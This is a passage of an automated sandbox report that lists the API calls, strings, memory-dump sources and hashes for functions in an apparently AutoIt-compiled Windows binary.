                    • Opcode ID: 6ce540c69a75539a3881b4d3f6b5f17635deb9580dab2ca057cd4dfd0ecc8ab7
                    • Instruction ID: a186fd4a5f37f0aa4ef0d2a01b61d484239af1aa81e95c74d2191ce5e47e7376
                    • Opcode Fuzzy Hash: 6ce540c69a75539a3881b4d3f6b5f17635deb9580dab2ca057cd4dfd0ecc8ab7
                    • Instruction Fuzzy Hash: 4E11E576904208BFC7059BA8DC08BAF7BADEB45320F14826AFA24D3350D6B18D0487B1
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                    • GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                    • RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 883493501-0
                    • Opcode ID: 10078be6291e7c51fb68a1f1c4fe21bb50aa46b56590a753510a17be2e949f3f
                    • Instruction ID: bb170177f9bd7f1051e5e70038d8e85553c73ab8b6d7411633ae5f662420e329
                    • Opcode Fuzzy Hash: 10078be6291e7c51fb68a1f1c4fe21bb50aa46b56590a753510a17be2e949f3f
                    • Instruction Fuzzy Hash: 1A014671200204EFDB204FA6DC88FAF7BACEF8A355B20043DF949C2260EA318D45CB61
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CD5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CD5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 699bfbd0655149355f1bb232e6f2a034fad57ad42275e0c9886295b47d6c9d6f
                    • Instruction ID: a75eb8128e517a335df85f7b89e6ff05a72cd67de3d78c82560e394723c58cdf
                    • Opcode Fuzzy Hash: 699bfbd0655149355f1bb232e6f2a034fad57ad42275e0c9886295b47d6c9d6f
                    • Instruction Fuzzy Hash: 1F011B76D04A19DBCF01DFE9E848BEDBB79FF09711F00405AEA11B2250EB305655C7A2
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CC8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CC8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CC8621
                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CC8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CC863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: fac1bdfed14febf33da26a9608a7bee0da63c4a72fe7c00edb1e3dbb3b018149
                    • Instruction ID: a65db5a4d46020b0d63f14af22bc93b4ea524bae377a8a8f80a4c37c8cac6dba
                    • Opcode Fuzzy Hash: fac1bdfed14febf33da26a9608a7bee0da63c4a72fe7c00edb1e3dbb3b018149
                    • Instruction Fuzzy Hash: D2F04931201204BFEB104FA5DC89F7F3BACEF8A754B00442DF949C6260CB619D4ADA61
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CC8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8682
                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CC8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: a5a3725a2728250010d123fbb37e2939c041f647426100ba48ae79bc15312172
                    • Instruction ID: e6c8e91c1b1a3bb9ed1fc104d04186eb744ce07c7d8939f8086daeb197c321b7
                    • Opcode Fuzzy Hash: a5a3725a2728250010d123fbb37e2939c041f647426100ba48ae79bc15312172
                    • Instruction Fuzzy Hash: C0F04F71240204AFEB111FA5EC88FBF3BACEF89B58B10002DF955C6150CF659946DA61
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCC6D1
                    • MessageBeep.USER32(00000000), ref: 00CCC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00CCC705
                    • EndDialog.USER32(?,00000001), ref: 00CCC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 224f34e5bd553ca22b0a2e131a84a3954d12f365d1bc38a44e69ad758ab5436e
                    • Instruction ID: d29d89d719723ab1aed0ff4314efdbfee2964319318b202e472941f314e90894
                    • Opcode Fuzzy Hash: 224f34e5bd553ca22b0a2e131a84a3954d12f365d1bc38a44e69ad758ab5436e
                    • Instruction Fuzzy Hash: 5D014F30500704ABEB215B20DD8EFAA77B8FF00B05F00066DF556E14E1DBE0A955CB81
                    APIs
                    • EndPath.GDI32(?), ref: 00C713BF
                    • StrokeAndFillPath.GDI32(?,?,00CABAD8,00000000,?), ref: 00C713DB
                    • SelectObject.GDI32(?,00000000), ref: 00C713EE
                    • DeleteObject.GDI32 ref: 00C71401
                    • StrokePath.GDI32(?), ref: 00C7141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 6c1f8ce992e6ce2307156cf97c2b97963630198ac86540642cb9d3c432cd656d
                    • Instruction ID: 14e555aaa42c41374bdec13e35ae5931daa84d3ae2151fe1036f7bffe89ea076
                    • Opcode Fuzzy Hash: 6c1f8ce992e6ce2307156cf97c2b97963630198ac86540642cb9d3c432cd656d
                    • Instruction Fuzzy Hash: 97F0EC30004308FBDB115F2AEC4C7683FA5EB05366F48C229EA69852F1CB318996EF71
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CC8E7F
                    • CloseHandle.KERNEL32(?), ref: 00CC8E94
                    • CloseHandle.KERNEL32(?), ref: 00CC8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CC8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00CC8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                    • String ID:
                    • API String ID: 3751786701-0
                    • Opcode ID: 32d3eca7540dc0334a224593175a7e4fcc6a07649744c0d35ea77ab2dd0dab1e
                    • Instruction ID: 49bf7ce5de3f4f00c5ce7dca25cb245e9480e6450232658a48c34455659cf18d
                    • Opcode Fuzzy Hash: 32d3eca7540dc0334a224593175a7e4fcc6a07649744c0d35ea77ab2dd0dab1e
                    • Instruction Fuzzy Hash: 27E0A536004001EBD6011BA1EC08B2DBB69EF893227148225F21581070CB325422DB51
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00C77BB1: _memmove.LIBCMT ref: 00C77C0B
                    • __swprintf.LIBCMT ref: 00C8302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C82EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 1dd45cb114d88c46f1800ea609d933349b5b620b492886ca5c4524fbd0904ad4
                    • Instruction ID: 819491f82e85f4577921028072ffc29e9e5e9aedcc077c575a18e7004ebf5828
                    • Opcode Fuzzy Hash: 1dd45cb114d88c46f1800ea609d933349b5b620b492886ca5c4524fbd0904ad4
                    • Instruction Fuzzy Hash: AA91AA311082419FCB18FF64C885D6EB7A4EF85754F00891EF89A9B2A1DB30EE04EB56
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00C952DD
                      • Part of subcall function 00CA0340: __87except.LIBCMT ref: 00CA037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 589cfae2c90b3ff0cf1272d33b5abd78a0f0e63ad5e4c9e4c029f4ad73e7a013
                    • Instruction ID: 996022ba6c1f3c3c5c587eb11ece19980180f715807ee919de201488a0fbe31c
                    • Opcode Fuzzy Hash: 589cfae2c90b3ff0cf1272d33b5abd78a0f0e63ad5e4c9e4c029f4ad73e7a013
                    • Instruction Fuzzy Hash: 51516A21E0DB0387DF127724C95537E2B90BB02794F304D58E4A9862F9EE748ED4EB56
                    Strings
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: cc51b278f83e5c24dcc9ac7673711a4b35486cb6e6aa907994e1493b95dcdb1a
                    • Instruction ID: 189b9ca2f9eb89e576d080fb24cba1baa92c4a569681f464cf7eaf630affee33
                    • Opcode Fuzzy Hash: cc51b278f83e5c24dcc9ac7673711a4b35486cb6e6aa907994e1493b95dcdb1a
                    • Instruction Fuzzy Hash: E2510175504746DFCF159F28C488BFA7BA4FF19310F684059E8A29B2A0D734AE82DB61
                    APIs
                    Strings
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 174fbb8847b80cef9db1964099e158de0508ddfef09d46319048e0375a7b1930
                    • Instruction ID: faf9b3c2394d2173810f7f2437736348073bcbed622d7ed6f0e01877cf17e97a
                    • Opcode Fuzzy Hash: 174fbb8847b80cef9db1964099e158de0508ddfef09d46319048e0375a7b1930
                    • Instruction Fuzzy Hash: D851CE71900319DFCB24DF65C885BAEBBF4EF44318F24856EE95ACA241E771E680CB54
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CFF910,00000000,?,?,?,?), ref: 00CF7C4E
                    • GetWindowLongW.USER32 ref: 00CF7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CF7C7B
                    Strings
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 47c5fe05ab010f4ce14872cd513572c45c9acf363dbd1606307dd3cddcb78fb1
                    • Instruction ID: 060e59a8489b9a6ff2f1c1e8f71ee74fa89496a6d26b4138083869231085efbb
                    • Opcode Fuzzy Hash: 47c5fe05ab010f4ce14872cd513572c45c9acf363dbd1606307dd3cddcb78fb1
                    • Instruction Fuzzy Hash: 3431B031204209ABDB518F38DC41BEA77A9EF45324F248725FA79D32E0C731ED519B60
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CF76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CF76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF7708
                    Strings
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 91da43fc1cfea6ee9d836a36649b014a5b4e7eef45c65692516c77ac3a8c283e
                    • Instruction ID: 9a9081181f2404109935751355067235a24dc67ad4bf651d9bcedf8e5b1d9cd5
                    • Opcode Fuzzy Hash: 91da43fc1cfea6ee9d836a36649b014a5b4e7eef45c65692516c77ac3a8c283e
                    • Instruction Fuzzy Hash: E1219F32510219BBDF169F64CC46FEA3B79EF48724F110214FE15AB1D0DAB1A851DBA1
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CF79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CF79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CF7A03
                    Strings
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 677f42c43a28df9b864e746fe300a0b1fbb5c4cbcc08f08b4da2a3ecd593f4e4
                    • Instruction ID: ad97a13d19322d7ffd04481dea5b922ac661ed7e70262e47d67dd23a7ed9eda2
                    • Opcode Fuzzy Hash: 677f42c43a28df9b864e746fe300a0b1fbb5c4cbcc08f08b4da2a3ecd593f4e4
                    • Instruction Fuzzy Hash: FD11E772244208BADF149F64CC05FAB77A9EF89764F02461DFB51A6090D6B1D811DB60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00CB1D88,?), ref: 00CEC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEC324
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 66b87d7544e4283b62d330b42fd072ecd6a4fa6731a41a7be5d83afbab238baf
                    • Instruction ID: 61c687fcc57e0d79e5c32c864aecae19f6b2fbb01853eb7b546de63356f0d3c3
                    • Opcode Fuzzy Hash: 66b87d7544e4283b62d330b42fd072ecd6a4fa6731a41a7be5d83afbab238baf
                    • Instruction Fuzzy Hash: 79E01274610713CFDB344F6AD884BDA76E4EF19759B80C43DE8A5D2260E7B0D842CB61
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74C2E), ref: 00C74CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C74CB5
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: ec205fa07f3a2283ee047eaffe20cbfb98e8c3d8fd4b109895b3a0b61fc8342a
                    • Instruction ID: e5cb087d0f6740bf5a94cb772ae4f87f10a4b50579a6bff48db49aa400185b89
                    • Opcode Fuzzy Hash: ec205fa07f3a2283ee047eaffe20cbfb98e8c3d8fd4b109895b3a0b61fc8342a
                    • Instruction Fuzzy Hash: 9DD05E31610727CFD7249F31DE5872A76E5EF05791B11C83ED89AD6250E770D881CA52
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74CE1,?), ref: 00C74DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C74DB4
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: a769153434d21c6c08b5a5db9d73de2631ff2a7a7cf76007a73dfe10cf0c0854
                    • Instruction ID: a82061e725ecf161ed56deb31b8875ed677a604cf97c1ae5b2ee7d6bdaead452
                    • Opcode Fuzzy Hash: a769153434d21c6c08b5a5db9d73de2631ff2a7a7cf76007a73dfe10cf0c0854
                    • Instruction Fuzzy Hash: 2FD01731550723CFD7349F31D858B5A76E4EF15355B11C83ED8EAD6250E770D880CA61
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74D2E,?,00C74F4F,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C74D81
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: bce4cf10b85a885c30544f374b541caa712906b4d27edf98ad2063f046aec2fa
                    • Instruction ID: 6c067c8c27bd522fb9637c6f52cafdaab2c24ed4eafde3c8be4036998e2ac93b
                    • Opcode Fuzzy Hash: bce4cf10b85a885c30544f374b541caa712906b4d27edf98ad2063f046aec2fa
                    • Instruction Fuzzy Hash: 4CD01731510723CFD7349F32D84872A76E8EF25352B11C83E94DAD6250E770D880CA61
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF12C1), ref: 00CF1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF1092
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 4f46bdbd5532b808fbad7a713c89ee48316f3294a65d26f29b5541489ac5dfcc
                    • Instruction ID: d5e229f5eb7de8029612dc823bd8d6a7155a6fb1cb55ab54857da3fcdc314d88
                    • Opcode Fuzzy Hash: 4f46bdbd5532b808fbad7a713c89ee48316f3294a65d26f29b5541489ac5dfcc
                    • Instruction Fuzzy Hash: BAD0E231510726CFD7209B35E818A2A76E4AF15365B55C82EA89ADA250EBB0D880CA62
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CE9009,?,00CFF910), ref: 00CE9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CE9415
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 651f2626d57546047766de408fb1d7736a7bbe45bcf8ec470a0c4cc963bc8760
                    • Instruction ID: 43515b5f04f2fe162db630a27d060415e4aa8bd3816bec5a378602ca6e6aad12
                    • Opcode Fuzzy Hash: 651f2626d57546047766de408fb1d7736a7bbe45bcf8ec470a0c4cc963bc8760
                    • Instruction Fuzzy Hash: 67D0C736500323CFC7208F32D90831A72E4EF00341B01C83EA492D2690E670C881DA22
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00CEE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00CEE415
                      • Part of subcall function 00CEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CEDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CEE615
                    • _memmove.LIBCMT ref: 00CEE628
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: f0ea4cb73688f9a7c3f8804d5e566427ee3ae41755023a133a93620f7912d6b6
                    • Instruction ID: 4ea223efa51e2190d0da355d6c5fcae380fc7f7d8f603087f24caafaf6d3fa92
                    • Opcode Fuzzy Hash: f0ea4cb73688f9a7c3f8804d5e566427ee3ae41755023a133a93620f7912d6b6
                    • Instruction Fuzzy Hash: FCC16A716083419FCB14DF29C48096ABBE4FF88754F14896EF8999B351D731EA46CB82
                    APIs
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: f68449de3af720e8789962c31a60f60dbb3eba05074f0e7691591686116ceb36
                    • Instruction ID: 86f74922818cdd470a30e677dfce78cd192a27c8c8d1a86492ecfa0856f80f98
                    • Opcode Fuzzy Hash: f68449de3af720e8789962c31a60f60dbb3eba05074f0e7691591686116ceb36
                    • Instruction Fuzzy Hash: 265183316083019BDF24AFA6D895F2EB7E5EF48310F24891FE55ACB291DB709940EF15
                    APIs
                      • Part of subcall function 00C75045: _fseek.LIBCMT ref: 00C7505D
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AAE
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AC1
                    • _free.LIBCMT ref: 00CD992C
                    • _free.LIBCMT ref: 00CD9933
                    • _free.LIBCMT ref: 00CD999E
                      • Part of subcall function 00C92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C99C64), ref: 00C92FA9
                      • Part of subcall function 00C92F95: GetLastError.KERNEL32(00000000,?,00C99C64), ref: 00C92FBB
                    • _free.LIBCMT ref: 00CD99A6
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                    • Instruction ID: b80ae90a0d92714c3690fe6438db019e9c5f74896b568d2c179229069c71c059
                    • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                    • Instruction Fuzzy Hash: 02516DB5904218AFDF249F64CC85A9EBBB9EF48310F0044AEB64DA7381DB715E80DF58
                    APIs
                    • GetWindowRect.USER32(0088E9D8,?), ref: 00CF9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00CF9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CF9B72
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: a161d71504bb50c4626c6621af864a23de5b710ade13945ac1012d22dceac1e4
                    • Instruction ID: f9d56835a79880a79dfa734a09a2ca1e65c3673a51237b48bffd4320c014933a
                    • Opcode Fuzzy Hash: a161d71504bb50c4626c6621af864a23de5b710ade13945ac1012d22dceac1e4
                    • Instruction Fuzzy Hash: AD512C34A00209AFCF64DF68D880ABE7BB5FF54360F148159FA259B2A0D730EE41DB91
                    APIs
